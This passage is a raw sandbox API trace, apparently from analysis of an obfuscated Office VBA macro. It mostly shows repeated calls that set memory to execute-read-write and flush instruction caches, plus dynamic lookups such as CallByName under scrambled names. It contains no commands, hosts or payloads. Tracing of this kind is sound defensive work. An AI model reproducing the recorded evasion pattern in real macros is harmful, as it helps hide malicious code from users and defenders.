0xffffffff [0113.459] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0113.459] GetCurrentProcess () returned 0xffffffff [0113.459] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0113.459] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.459] GetCurrentProcess () returned 0xffffffff [0113.459] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0113.459] GetCurrentProcess () returned 0xffffffff [0113.459] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0113.459] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.460] GetCurrentProcess () returned 0xffffffff [0113.460] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0113.460] GetCurrentProcess () returned 0xffffffff [0113.460] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0113.460] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.460] GetCurrentProcess () returned 0xffffffff [0113.460] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0113.460] GetCurrentProcess () returned 0xffffffff [0113.460] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0113.460] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.461] GetCurrentProcess () returned 0xffffffff [0113.461] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0113.461] GetCurrentProcess () returned 0xffffffff [0113.461] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0113.461] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.461] GetCurrentProcess () returned 0xffffffff [0113.461] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0113.461] GetCurrentProcess () returned 0xffffffff [0113.461] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0113.462] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.462] GetCurrentProcess () returned 0xffffffff [0113.462] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0113.462] GetCurrentProcess () returned 0xffffffff [0113.462] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0113.462] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0113.463] GetCurrentProcess () returned 0xffffffff [0113.463] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0113.463] SetErrorMode (uMode=0x8001) returned 0x8001 [0113.463] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0113.463] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x695d0000 [0113.463] SetErrorMode (uMode=0x8001) returned 0x8001 [0113.464] GetProcAddress (hModule=0x695d0000, lpProcName=0x2c9) returned 0x697dfe55 [0113.465] GetAsyncKeyState (vKey=3) returned 0 [0113.525] GetAsyncKeyState (vKey=3) returned 0 [0113.526] CRetailMalloc_Alloc () returned 0xcb00948 [0113.526] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.526] memcpy (in: _Dst=0xb755050, _Src=0x1978c4, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0113.526] memcpy (in: _Dst=0xb754f48, _Src=0x197714, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.526] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb31886c, cbMultiByte=10, lpWideCharStr=0x1146058c, cchWideChar=22 | out: lpWideCharStr="pjCW0LxjVj") returned 10 [0113.526] memcpy (in: _Dst=0xcadad70, _Src=0x11460588, _Size=0x1a | out: _Dst=0xcadad70) returned 0xcadad70 [0113.526] memcpy (in: _Dst=0xb754f4c, _Src=0x1978dc, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.526] memcpy (in: _Dst=0xb754f4c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302d2e, cbMultiByte=6, lpWideCharStr=0x1976c4, cchWideChar=7 | out: lpWideCharStr="VbGet") returned 6 [0113.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2aba, cbMultiByte=6, lpWideCharStr=0x197724, cchWideChar=7 | out: lpWideCharStr="VbGet") returned 6 [0113.527] memcpy (in: _Dst=0xf5e9288, _Src=0xb3b91b8, _Size=0x4 | out: _Dst=0xf5e9288) returned 0xf5e9288 [0113.528] memcpy (in: _Dst=0xb754f50, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f50) returned 0xb754f50 [0113.528] memcpy (in: _Dst=0xb754f54, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f54) returned 0xb754f54 [0113.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302d52, cbMultiByte=11, lpWideCharStr=0x1976c4, cchWideChar=12 | out: lpWideCharStr="CallByName") returned 11 [0113.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2a32, cbMultiByte=11, lpWideCharStr=0x197724, cchWideChar=12 | out: lpWideCharStr="CallByName") returned 11 [0113.530] memcpy (in: _Dst=0x1976ec, _Src=0x197760, _Size=0x8 | out: _Dst=0x1976ec) returned 0x1976ec [0113.530] memcpy (in: _Dst=0xcb06ed8, _Src=0x1976ec, _Size=0x8 | out: _Dst=0xcb06ed8) returned 0xcb06ed8 [0113.530] CRetailMalloc_Alloc () returned 0xc822d18 [0113.530] CRetailMalloc_Free () returned 0x1 [0113.530] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.530] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x96\x96\x96\x97\x96\x96\x96\x97\x97\x96\x96\x96\x97\x97\x96\x97\x96\x97\x96\x96\x96\x96", cchCount1=-1, lpString2="\x97\x97\x97\x96\x97\x97\x97\x97\x96\x96\x97\x96\x97\x97\x96\x97\x97\x96\x97\x97\x97\x96\x97\x96", cchCount2=-1) returned 1 [0113.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302d7a, cbMultiByte=25, lpWideCharStr=0x1976c4, cchWideChar=26 | out: lpWideCharStr="———–————––—–——–——–———–—–") returned 25 [0113.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c095a, cbMultiByte=25, lpWideCharStr=0x197724, cchWideChar=26 | out: lpWideCharStr="———–————––—–——–——–———–—–") returned 25 [0113.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c095a, cbMultiByte=25, lpWideCharStr=0x197724, cchWideChar=26 | out: lpWideCharStr="———–————––—–——–——–———–—–") returned 25 [0113.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c095a, cbMultiByte=25, lpWideCharStr=0x197724, cchWideChar=26 | out: lpWideCharStr="———–————––—–——–——–———–—–") returned 25 [0113.531] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x96\x96\x96\x97\x96\x96\x96\x97\x97\x96\x96\x96\x97\x97\x96\x97\x96\x97\x96\x96\x96\x96", cchCount1=-1, lpString2="\x97\x97\x97\x96\x97\x97\x97\x97\x96\x96\x97\x96\x97\x97\x96\x97\x97\x96\x97\x97\x97\x96\x97\x96", cchCount2=-1) returned 1 [0113.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c095a, cbMultiByte=25, lpWideCharStr=0x197724, cchWideChar=26 | out: lpWideCharStr="———–————––—–——–——–———–—–") returned 25 [0113.531] CRetailMalloc_Alloc () returned 0xc823100 [0113.531] _mbscpy_s (in: _Dst=0xc823100, _DstSizeInBytes=0x19, _Src=0x112c095a | out: _Dst=0xc823100) returned 0x0 [0113.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0b56, cbMultiByte=32, lpWideCharStr=0x197734, cchWideChar=33 | out: lpWideCharStr="_B_var_———–————––—–——–——–———–—–") returned 32 [0113.531] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0x19, _Src=0x112c095a | out: _Dst=0x19779c) returned 0x0 [0113.531] CRetailMalloc_Free () returned 0x1 [0113.531] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0113.532] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.532] memcpy (in: _Dst=0xb754f4c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.532] memcpy (in: _Dst=0xb754f48, _Src=0x197714, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.532] memcpy (in: _Dst=0xb754f48, _Src=0x197714, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.532] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.532] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6980ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0113.533] memcpy (in: _Dst=0xcb00a34, _Src=0x197944, _Size=0x18 | out: _Dst=0xcb00a34) returned 0xcb00a34 [0113.533] CRetailMalloc_Realloc () returned 0xcb00948 [0113.533] CRetailMalloc_Free () returned 0x1 [0113.534] GetCurrentProcess () returned 0xffffffff [0113.534] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0113.534] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.536] GetCurrentProcess () returned 0xffffffff [0113.536] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0113.536] GetCurrentProcess () returned 0xffffffff [0113.536] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0113.536] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.536] GetCurrentProcess () returned 0xffffffff [0113.536] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0113.536] GetCurrentProcess () returned 0xffffffff [0113.536] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0113.536] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.537] GetCurrentProcess () returned 0xffffffff [0113.537] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0113.537] GetCurrentProcess () returned 0xffffffff [0113.537] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0113.537] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.537] GetCurrentProcess () returned 0xffffffff [0113.537] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0113.537] GetCurrentProcess () returned 0xffffffff [0113.537] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0113.538] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.538] GetCurrentProcess () returned 0xffffffff [0113.538] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0113.538] GetCurrentProcess () returned 0xffffffff [0113.538] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0113.538] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.539] GetCurrentProcess () returned 0xffffffff [0113.539] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0113.539] GetCurrentProcess () returned 0xffffffff [0113.539] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0113.539] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.539] GetCurrentProcess () returned 0xffffffff [0113.539] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0113.539] GetCurrentProcess () returned 0xffffffff [0113.539] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0113.539] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.540] GetCurrentProcess () returned 0xffffffff [0113.540] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0113.540] GetCurrentProcess () returned 0xffffffff [0113.540] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0113.540] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.540] GetCurrentProcess () returned 0xffffffff [0113.541] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0113.541] GetCurrentProcess () returned 0xffffffff [0113.541] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0113.541] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.541] GetCurrentProcess () returned 0xffffffff [0113.541] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0113.541] GetCurrentProcess () returned 0xffffffff [0113.541] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0113.541] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.542] GetCurrentProcess () returned 0xffffffff [0113.542] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0113.542] GetCurrentProcess () returned 0xffffffff [0113.542] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0113.542] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.542] GetCurrentProcess () returned 0xffffffff [0113.542] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0113.542] GetCurrentProcess () returned 0xffffffff [0113.542] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0113.542] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.543] GetCurrentProcess () returned 0xffffffff [0113.543] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0113.543] GetCurrentProcess () returned 0xffffffff [0113.543] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0113.543] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.543] GetCurrentProcess () returned 0xffffffff [0113.543] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0113.543] GetCurrentProcess () returned 0xffffffff [0113.543] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0113.544] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.544] GetCurrentProcess () returned 0xffffffff [0113.544] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0113.544] GetCurrentProcess () returned 0xffffffff [0113.544] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0113.544] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.544] GetCurrentProcess () returned 0xffffffff [0113.545] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0113.545] GetCurrentProcess () returned 0xffffffff [0113.545] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0113.545] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.545] GetCurrentProcess () returned 0xffffffff [0113.545] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0113.545] GetCurrentProcess () returned 0xffffffff [0113.545] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0113.545] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.546] GetCurrentProcess () returned 0xffffffff [0113.546] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0113.546] GetCurrentProcess () returned 0xffffffff [0113.546] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0113.546] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.547] GetCurrentProcess () returned 0xffffffff [0113.547] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0113.547] GetCurrentProcess () returned 0xffffffff [0113.547] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0113.547] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.548] GetCurrentProcess () returned 0xffffffff [0113.548] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0113.548] GetCurrentProcess () returned 0xffffffff [0113.548] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0113.548] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.550] GetCurrentProcess () returned 0xffffffff [0113.550] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0113.550] GetCurrentProcess () returned 0xffffffff [0113.550] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0113.550] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.551] GetCurrentProcess () returned 0xffffffff [0113.551] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0113.551] GetCurrentProcess () returned 0xffffffff [0113.552] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0113.552] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.552] GetCurrentProcess () returned 0xffffffff [0113.552] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0113.552] GetCurrentProcess () returned 0xffffffff [0113.552] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0113.552] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.553] GetCurrentProcess () returned 0xffffffff [0113.553] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0113.553] GetCurrentProcess () returned 0xffffffff [0113.553] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0113.553] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.553] GetCurrentProcess () returned 0xffffffff [0113.553] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0113.553] GetCurrentProcess () returned 0xffffffff [0113.553] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0113.553] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.554] GetCurrentProcess () returned 0xffffffff [0113.554] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0113.554] GetCurrentProcess () returned 0xffffffff [0113.554] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0113.554] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.554] GetCurrentProcess () returned 0xffffffff [0113.554] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0113.554] GetCurrentProcess () returned 0xffffffff [0113.554] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0113.554] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.555] GetCurrentProcess () returned 0xffffffff [0113.555] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0113.555] GetCurrentProcess () returned 0xffffffff [0113.555] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0113.555] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.555] GetCurrentProcess () returned 0xffffffff [0113.555] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0113.555] GetCurrentProcess () returned 0xffffffff [0113.555] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0113.555] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.556] GetCurrentProcess () returned 0xffffffff [0113.556] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0113.556] GetCurrentProcess () returned 0xffffffff [0113.556] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0113.556] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.557] GetCurrentProcess () returned 0xffffffff [0113.557] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0113.557] SetErrorMode (uMode=0x8001) returned 0x8001 [0113.557] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0113.557] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x695d0000 [0113.557] SetErrorMode (uMode=0x8001) returned 0x8001 [0113.558] GetProcAddress (hModule=0x695d0000, lpProcName=0x2cb) returned 0x697a04b4 [0113.559] GetAsyncKeyState (vKey=3) returned 0 [0113.559] CRetailMalloc_Alloc () returned 0xcb00aa0 [0113.559] memcpy (in: _Dst=0xb754f48, _Src=0x19779c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.559] memcpy (in: _Dst=0xcb00ac0, _Src=0x197804, _Size=0x18 | out: _Dst=0xcb00ac0) returned 0xcb00ac0 [0113.560] CRetailMalloc_Realloc () returned 0xcb00aa0 [0113.560] CRetailMalloc_Free () returned 0x1 [0113.560] GetCurrentProcess () returned 0xffffffff [0113.560] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0113.560] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.560] GetCurrentProcess () returned 0xffffffff [0113.560] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0113.560] GetCurrentProcess () returned 0xffffffff [0113.560] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0113.560] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0113.561] GetCurrentProcess () returned 0xffffffff [0113.561] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0113.561] GetCurrentProcess () returned 0xffffffff [0113.561] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0113.561] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | 